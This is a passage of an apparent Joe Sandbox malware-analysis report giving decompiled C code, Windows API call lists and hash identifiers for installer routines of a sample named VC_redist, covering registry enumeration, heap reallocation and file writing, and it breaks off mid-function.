                                                                          0x0004663e
                                                                          0x00046678
                                                                          0x00046680
                                                                          0x00046680
                                                                          0x00046685
                                                                          0x00046687
                                                                          0x00046687
                                                                          0x00000000
                                                                          0x00046685
                                                                          0x0004667c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004667e
                                                                          0x00000000
                                                                          0x0004667e
                                                                          0x00046642
                                                                          0x0004664b
                                                                          0x00046650
                                                                          0x00000000
                                                                          0x00046609
                                                                          0x00046609
                                                                          0x0004660e
                                                                          0x00046610
                                                                          0x00046611
                                                                          0x00046613
                                                                          0x0004666d
                                                                          0x00000000
                                                                          0x0004666f

                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(0005B508,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 000466A3
                                                                          • GetLastError.KERNEL32 ref: 000466BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                          • String ID: @Met$comres.dll
                                                                          • API String ID: 203985260-77194002
                                                                          • Opcode ID: 5d91e682255937982d4f374dae574d8585f610fdc9d320dbbbefe75b8494b593
                                                                          • Instruction ID: 3a33ade3be8366a057d3f1a5cf30a9febfa2252c632b5a1e6dddec202a72fc24
                                                                          • Opcode Fuzzy Hash: 5d91e682255937982d4f374dae574d8585f610fdc9d320dbbbefe75b8494b593
                                                                          • Instruction Fuzzy Hash: 5331F6B1600215ABDB31AF59D885AAB3BE89F53750F160139F8155B191FB32CD40C7AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050D1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00050D1C(void* __ecx, void* _a4, int _a8, short** _a12) {
				int _v8;
				signed short _t22;
				void* _t24;
				signed short _t27;
				short** _t41;
				void* _t44;

				_t41 = _a12;
				_v8 = 0;
				if(_t41 == 0 ||  *_t41 == 0) {
					L4:
					_v8 = 2;
					_t44 = E00011EDE(_t41, 2);
					if(_t44 >= 0) {
						goto L5;
					}
				} else {
					_t44 = E0001275D( *_t41,  &_v8);
					if(_t44 >= 0) {
						if(_v8 >= 2) {
							L5:
							_t22 = RegEnumKeyExW(_a4, _a8,  *_t41,  &_v8, 0, 0, 0, 0);
							if(_t22 != 0xea) {
								if(_t22 != 0x103) {
									goto L11;
								} else {
									_t44 = 0x80070103;
								}
							} else {
								_t27 = RegQueryInfoKeyW(_a4, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0, 0, 0);
								if(_t27 == 0) {
									_v8 = _v8 + 1;
									_t44 = E00011EDE(_t41, _v8 + 1);
									if(_t44 >= 0) {
										_t22 = RegEnumKeyExW(_a4, _a8,  *_t41,  &_v8, 0, 0, 0, 0);
										L11:
										if(_t22 == 0) {
											( *_t41)[_v8] = 0;
										} else {
											_t48 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
											_t24 = 0x80004005;
											_t44 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
											_push(_t44);
											_push(0x133);
											goto L8;
										}
									}
								} else {
									_t51 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
									_t24 = 0x80004005;
									_t44 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
									_push(_t44);
									_push(0x127);
									L8:
									_push("regutil.cpp");
									E000137D3(_t24);
								}
							}
						} else {
							goto L4;
						}
					}
				}
				return _t44;
			}









                                                                          0x00050d23
                                                                          0x00050d28
                                                                          0x00050d2d
                                                                          0x00050d4e
                                                                          0x00050d51
                                                                          0x00050d5d
                                                                          0x00050d61
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050d33
                                                                          0x00050d3e
                                                                          0x00050d42
                                                                          0x00050d4c
                                                                          0x00050d67
                                                                          0x00050d77
                                                                          0x00050d82
                                                                          0x00050e20
                                                                          0x00000000
                                                                          0x00050e22
                                                                          0x00050e22
                                                                          0x00050e22
                                                                          0x00050d88
                                                                          0x00050d99
                                                                          0x00050da1
                                                                          0x00050dd3
                                                                          0x00050ddb
                                                                          0x00050ddf
                                                                          0x00050df1
                                                                          0x00050df7
                                                                          0x00050df9
                                                                          0x00050e30
                                                                          0x00050dfb
                                                                          0x00050e06
                                                                          0x00050e09
                                                                          0x00050e10
                                                                          0x00050e13
                                                                          0x00050e14
                                                                          0x00000000
                                                                          0x00050e14
                                                                          0x00050df9
                                                                          0x00050da3
                                                                          0x00050dae
                                                                          0x00050db1
                                                                          0x00050db8
                                                                          0x00050dbb
                                                                          0x00050dbc
                                                                          0x00050dc1
                                                                          0x00050dc1
                                                                          0x00050dc6
                                                                          0x00050dc6
                                                                          0x00050da1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050d4c
                                                                          0x00050d42
                                                                          0x00050e3c

                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00038BD8), ref: 00050D77
                                                                          • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00038BD8,00000000), ref: 00050D99
                                                                          • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00038BD8,00000000,00000000,00000000), ref: 00050DF1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$InfoQuery
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 73471667-955085611
                                                                          • Opcode ID: 5eb3dfb7b0607a1ce2ebb56935b185869e8e2c79d7cbc592ccf108714227ca6e
                                                                          • Instruction ID: 9dcc61efd8653f1968d9e9e08af0c34e28b1c66fd49b91069700d282d4ddc40e
                                                                          • Opcode Fuzzy Hash: 5eb3dfb7b0607a1ce2ebb56935b185869e8e2c79d7cbc592ccf108714227ca6e
                                                                          • Instruction Fuzzy Hash: F131AEB6A01129FFEB218A998D81EEFBBECEF04351F214466BD04E7150D735AE14D6A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000578C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E000578C5(void* __ebx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t40;
				intOrPtr* _t45;
				intOrPtr _t50;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t50 = E000138D4(0x10, 1);
				if(_t50 != 0) {
					_t45 = _a4;
					_t52 =  *((intOrPtr*)( *_t45 + 0x9c))(_t45,  &_v8, __ebx);
					if(_t52 != 0) {
						_t53 =  ==  ? 0 : _t52;
						goto L6;
					} else {
						_t53 = E000121A5(_t50, _v8, _t25);
						if(_t53 >= 0) {
							L6:
							if(_t53 >= 0) {
								_t53 =  *((intOrPtr*)( *_t45 + 0xa4))(_t45,  &_v12);
								if(_t53 >= 0) {
									_t11 = _t50 + 4; // 0x4
									_t53 = E000121A5(_t11, _v12, 0);
									if(_t53 >= 0) {
										_t53 = E000533C8(_t45,  &_v16);
										if(_t53 >= 0) {
											_t13 = _t50 + 8; // 0x8
											_t53 = E000121A5(_t13, _v16, 0);
											if(_t53 >= 0) {
												_t40 = _a8;
												while( *_t40 != 0) {
													_t40 =  *_t40 + 0xc;
												}
												 *_t40 = _t50;
												_t50 = 0;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t53 = 0x8007000e;
					E000137D3(_t23, "atomutil.cpp", 0x3ea, 0x8007000e);
				}
				E00056A33(_t50);
				_t51 = __imp__#6;
				if(_v8 != 0) {
					 *_t51(_v8);
				}
				if(_v12 != 0) {
					 *_t51(_v12);
				}
				if(_v16 != 0) {
					 *_t51(_v16);
				}
				return _t53;
			}












                                                                          0x000578d3
                                                                          0x000578d6
                                                                          0x000578d9
                                                                          0x000578e1
                                                                          0x000578e5
                                                                          0x00057902
                                                                          0x00057912
                                                                          0x00057916
                                                                          0x0005792f
                                                                          0x00000000
                                                                          0x00057918
                                                                          0x00057922
                                                                          0x00057926
                                                                          0x00057932
                                                                          0x00057934
                                                                          0x00057943
                                                                          0x00057947
                                                                          0x0005794e
                                                                          0x00057957
                                                                          0x0005795b
                                                                          0x00057967
                                                                          0x0005796b
                                                                          0x0005796f
                                                                          0x0005797c
                                                                          0x00057980
                                                                          0x00057982
                                                                          0x0005798c
                                                                          0x00057989
                                                                          0x00057989
                                                                          0x00057990
                                                                          0x00057992
                                                                          0x00057992
                                                                          0x00057980
                                                                          0x0005796b
                                                                          0x0005795b
                                                                          0x00057947
                                                                          0x00057934
                                                                          0x00057926
                                                                          0x000578e7
                                                                          0x000578e7
                                                                          0x000578f7
                                                                          0x000578f7
                                                                          0x00057996
                                                                          0x0005799f
                                                                          0x000579a5
                                                                          0x000579aa
                                                                          0x000579aa
                                                                          0x000579b0
                                                                          0x000579b5
                                                                          0x000579b5
                                                                          0x000579bb
                                                                          0x000579c0
                                                                          0x000579c0
                                                                          0x000579c9

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000579AA
                                                                          • SysFreeString.OLEAUT32(?), ref: 000579B5
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000579C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$Heap$AllocateProcess
                                                                          • String ID: atomutil.cpp
                                                                          • API String ID: 2724874077-4059165915
                                                                          • Opcode ID: f6e6de035d5683fd7819f05f22223129df7146e627384dd8681de19248a7c3af
                                                                          • Instruction ID: 3f23fb8c9041e7e7fa5fe9898c08c0b335388941178388f405cf3d9b6bb2962a
                                                                          • Opcode Fuzzy Hash: f6e6de035d5683fd7819f05f22223129df7146e627384dd8681de19248a7c3af
                                                                          • Instruction Fuzzy Hash: 9731A572D05229BFDB129BA4DC45EAFB7A8AF04711F0141A4EE08BB111D731DE48ABA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004CE20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E0004CE20(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				short _v1716;
				char _v5132;
				intOrPtr _v5136;
				long _v5140;
				void* _v5144;
				int _v5148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				intOrPtr _t38;
				signed int* _t41;
				int _t45;
				int _t54;
				void* _t55;
				signed short* _t59;
				signed int _t65;
				signed int _t67;
				signed short* _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t73;
				intOrPtr _t74;
				signed int _t75;

				E00059F00();
				_t31 =  *0x7a008; // 0xfbf51acb
				_v8 = _t31 ^ _t75;
				_t54 = 0;
				_t72 = _a4;
				_t59 = _a12;
				_t69 = _t59;
				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x30));
				_t38 = _a16 + _t59;
				 *_t72 = 0;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				_v5136 = _t38;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				if(_t59 < _t38) {
					while(1) {
						L1:
						_t74 = _v5136;
						_t41 =  &_v1716;
						while(_t69 < _t74) {
							_t65 =  *_t69 & 0x0000ffff;
							_t69 =  &(_t69[1]);
							if(_t65 == 0xa) {
								_t67 = 0xd;
								 *_t41 = _t67;
								_t41 =  &(_t41[0]);
							}
							 *_t41 = _t65;
							_t41 =  &(_t41[0]);
							if(_t41 <  &_v12) {
								continue;
							}
							break;
						}
						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
						_t72 = _a4;
						_v5148 = _t45;
						if(_t45 == 0) {
							L11:
							 *_t72 = GetLastError();
						} else {
							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
								_t54 = _t54 + _v5140;
								_t45 = _v5148;
								if(_t54 < _t45) {
									continue;
								} else {
									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
									if(_t69 < _v5136) {
										_t54 = 0;
										goto L1;
									}
								}
								goto L12;
							}
							goto L11;
						}
						goto L12;
					}
				}
				L12:
				_pop(_t70);
				_pop(_t73);
				_pop(_t55);
				return E0003DE36(_t55, _v8 ^ _t75, _t67, _t70, _t73);
			}






























                                                                          0x0004ce2a
                                                                          0x0004ce2f
                                                                          0x0004ce36
                                                                          0x0004ce50
                                                                          0x0004ce52
                                                                          0x0004ce5a
                                                                          0x0004ce5d
                                                                          0x0004ce5f
                                                                          0x0004ce68
                                                                          0x0004ce6a
                                                                          0x0004ce6c
                                                                          0x0004ce6f
                                                                          0x0004ce75
                                                                          0x0004ce7a
                                                                          0x0004ce80
                                                                          0x0004ce80
                                                                          0x0004ce80
                                                                          0x0004ce86
                                                                          0x0004ce8c
                                                                          0x0004ce90
                                                                          0x0004ce93
                                                                          0x0004ce99
                                                                          0x0004ce9d
                                                                          0x0004ce9e
                                                                          0x0004cea1
                                                                          0x0004cea1
                                                                          0x0004cea4
                                                                          0x0004cea7
                                                                          0x0004ceaf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004ceaf
                                                                          0x0004ced3
                                                                          0x0004ced9
                                                                          0x0004cedc
                                                                          0x0004cee4
                                                                          0x0004cf32
                                                                          0x0004cf38
                                                                          0x0004cee6
                                                                          0x0004cee6
                                                                          0x0004cf0b
                                                                          0x0004cf11
                                                                          0x0004cf19
                                                                          0x00000000
                                                                          0x0004cf1b
                                                                          0x0004cf20
                                                                          0x0004cf29
                                                                          0x0004cf2b
                                                                          0x00000000
                                                                          0x0004cf2b
                                                                          0x0004cf29
                                                                          0x00000000
                                                                          0x0004cf19
                                                                          0x00000000
                                                                          0x0004cee6
                                                                          0x00000000
                                                                          0x0004cee4
                                                                          0x0004ce80
                                                                          0x0004cf3a
                                                                          0x0004cf3f
                                                                          0x0004cf40
                                                                          0x0004cf43
                                                                          0x0004cf4c

                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,0004D17F,?,00000000,?), ref: 0004CED3
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0004D17F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CF01
                                                                          • GetLastError.KERNEL32(?,0004D17F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CF32
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 2456169464-2381362037
                                                                          • Opcode ID: e79487fe789fbff794dfc095619aa1f0a8f9d9109a6e402006a83cc111be576a
                                                                          • Instruction ID: 3bbaf8cc7fb022142413f0bcf9652347d91a9cd82860eadd006b1804a89572c2
                                                                          • Opcode Fuzzy Hash: e79487fe789fbff794dfc095619aa1f0a8f9d9109a6e402006a83cc111be576a
                                                                          • Instruction Fuzzy Hash: D33181B1A01219AFEB64CF69DC949EAB7B9FF08305F0444BDE90AD7250D730AD84CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000388CF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 30%
                                                                          			E000388CF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _t44;
				void* _t47;

				_t39 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				if(E00050E3F(_a8, _a12, 0x20019,  &_v8) >= 0) {
					if(E00038458(_v8, _a16,  &_v12) < 0 || _v12 == 0) {
						_t47 = 0x80070490;
					} else {
						_t44 = _a20;
						_t47 = E000138F6( *(_t44 + 4) + 1, _t39, _t44,  *(_t44 + 4) + 1, 0xf8, 5);
						if(_t47 >= 0) {
							_t47 = E0003899C(_t39, _a12, _v8, _a4, _v12,  *(_t44 + 4) * 0xf8 +  *_t44);
							if(_t47 >= 0) {
								 *(_t44 + 4) =  *(_t44 + 4) + 1;
							} else {
								_push(_a12);
								_push("Failed to initialize package from related bundle id: %ls");
								goto L2;
							}
						} else {
							_push("Failed to ensure there is space for related bundles.");
							_push(_t47);
							E0005012F();
						}
					}
				} else {
					_push(_a12);
					_push("Failed to open uninstall key for potential related bundle: %ls");
					L2:
					_push(_t47);
					E0005012F();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t47;
			}







                                                                          0x000388cf
                                                                          0x000388d2
                                                                          0x000388d3
                                                                          0x000388d4
                                                                          0x000388db
                                                                          0x000388f6
                                                                          0x0003891c
                                                                          0x0003897e
                                                                          0x00038924
                                                                          0x00038924
                                                                          0x00038939
                                                                          0x0003893d
                                                                          0x00038969
                                                                          0x0003896d
                                                                          0x00038979
                                                                          0x0003896f
                                                                          0x0003896f
                                                                          0x00038972
                                                                          0x00000000
                                                                          0x00038972
                                                                          0x0003893f
                                                                          0x0003893f
                                                                          0x00038944
                                                                          0x00038945
                                                                          0x0003894b
                                                                          0x0003893d
                                                                          0x000388f8
                                                                          0x000388f8
                                                                          0x000388fb
                                                                          0x00038900
                                                                          0x00038900
                                                                          0x00038901
                                                                          0x00038906
                                                                          0x00038987
                                                                          0x0003898c
                                                                          0x0003898c
                                                                          0x00038999

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00038C14,00000000,00000000), ref: 0003898C
                                                                          Strings
                                                                          • Failed to ensure there is space for related bundles., xrefs: 0003893F
                                                                          • Failed to open uninstall key for potential related bundle: %ls, xrefs: 000388FB
                                                                          • Failed to initialize package from related bundle id: %ls, xrefs: 00038972
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                          • API String ID: 47109696-1717420724
                                                                          • Opcode ID: e708e397a987b975dcc82af25bde531e0af407eefa74813eb89a6d2febb3d5ed
                                                                          • Instruction ID: 5ed6599892f4f7b9da0f92a572458a101b8e21015bc10b11bab8a83038717417
                                                                          • Opcode Fuzzy Hash: e708e397a987b975dcc82af25bde531e0af407eefa74813eb89a6d2febb3d5ed
                                                                          • Instruction Fuzzy Hash: FB21743294031ABBDB139A94CC06BFEBB6DEF04711F188196F90066151DB719E20E791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00013A97 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E00013A97(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _t11;
				void* _t21;
				char* _t24;
				char _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				char _t31;

				_push(_a8);
				_t26 = 0;
				_push(_a4);
				_t11 = 0x10;
				_t27 = 0x18;
				_t12 =  !=  ? _t27 : _t11;
				_t30 = HeapReAlloc(GetProcessHeap(),  !=  ? _t27 : _t11, ??, ??);
				if(_t30 != 0) {
					L8:
					 *_a16 = _t30;
					_t31 = _t26;
					L9:
					if(_t31 != 0) {
						E00013999(_t31);
					}
					L11:
					return _t26;
				}
				_t31 = E000138D4(_a8, _a12);
				if(_t31 == 0) {
					_t26 = 0x8007000e;
					E000137D3(_t18, "memutil.cpp", 0x61, 0x8007000e);
					goto L11;
				}
				_t29 = E00013B51(_a4);
				if(_t29 != 0xffffffff) {
					_t21 = E00013B51(_t31);
					_t28 = _t21;
					if(_t21 == 0xffffffff) {
						goto L3;
					}
					_t22 =  >  ? _t29 : _t21;
					E00031664(_t31, _t28, _a4,  >  ? _t29 : _t21);
					_t24 = _a4;
					if(_t29 == 0) {
						L7:
						E00013999(_a4);
						goto L8;
					} else {
						goto L6;
					}
					do {
						L6:
						 *_t24 = 0;
						_t24 = _t24 + 1;
						_t29 = _t29 - 1;
					} while (_t29 != 0);
					goto L7;
				}
				L3:
				_t26 = 0x80070057;
				goto L9;
			}











                                                                          0x00013a9d
                                                                          0x00013aa0
                                                                          0x00013aa2
                                                                          0x00013aaa
                                                                          0x00013aad
                                                                          0x00013aae
                                                                          0x00013abf
                                                                          0x00013ac3
                                                                          0x00013b23
                                                                          0x00013b26
                                                                          0x00013b28
                                                                          0x00013b2a
                                                                          0x00013b2c
                                                                          0x00013b2f
                                                                          0x00013b2f
                                                                          0x00013b36
                                                                          0x00013b3a
                                                                          0x00013b3a
                                                                          0x00013ad0
                                                                          0x00013ad4
                                                                          0x00013b3d
                                                                          0x00013b4a
                                                                          0x00000000
                                                                          0x00013b4a
                                                                          0x00013ade
                                                                          0x00013ae3
                                                                          0x00013aed
                                                                          0x00013af2
                                                                          0x00013af7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013afb
                                                                          0x00013b04
                                                                          0x00013b09
                                                                          0x00013b11
                                                                          0x00013b1b
                                                                          0x00013b1e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013b13
                                                                          0x00013b13
                                                                          0x00013b13
                                                                          0x00013b15
                                                                          0x00013b16
                                                                          0x00013b16
                                                                          0x00000000
                                                                          0x00013b13
                                                                          0x00013ae5
                                                                          0x00013ae5
                                                                          0x00000000

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000010,00000000,80004005,00000000,00000000,00000100,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7), ref: 00013AB2
                                                                          • HeapReAlloc.KERNEL32(00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100,?,80004005,00000000), ref: 00013AB9
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          • _memcpy_s.LIBCMT ref: 00013B04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                          • String ID: memutil.cpp
                                                                          • API String ID: 3406509257-2429405624
                                                                          • Opcode ID: 0157f69c1c95994168259233d8b532aed498ebb919c0f98346b03de8da536867
                                                                          • Instruction ID: 0232028c134efbae55344b9de62df34f9871689bdde6152acb97115e8ef43d01
                                                                          • Opcode Fuzzy Hash: 0157f69c1c95994168259233d8b532aed498ebb919c0f98346b03de8da536867
                                                                          • Instruction Fuzzy Hash: 6E110331605618BFDF221B68DC85DEF3A99EF44764B004224FA155B192EB71CF909390
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00023955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00023955(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4) {
				void* _v8;
				void* _v12;
				signed short* _t13;
				signed int* _t21;
				signed short* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t30;

				_v8 = 0;
				_v12 = 0;
				if(E00050E3F(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", 0x20019,  &_v8) < 0 || E00050F6E(_v8, L"Logging",  &_v12) < 0) {
					_t13 = _v12;
				} else {
					_t13 = _v12;
					_t22 = _t13;
					if( *_t13 != 0) {
						_t21 = _a4;
						do {
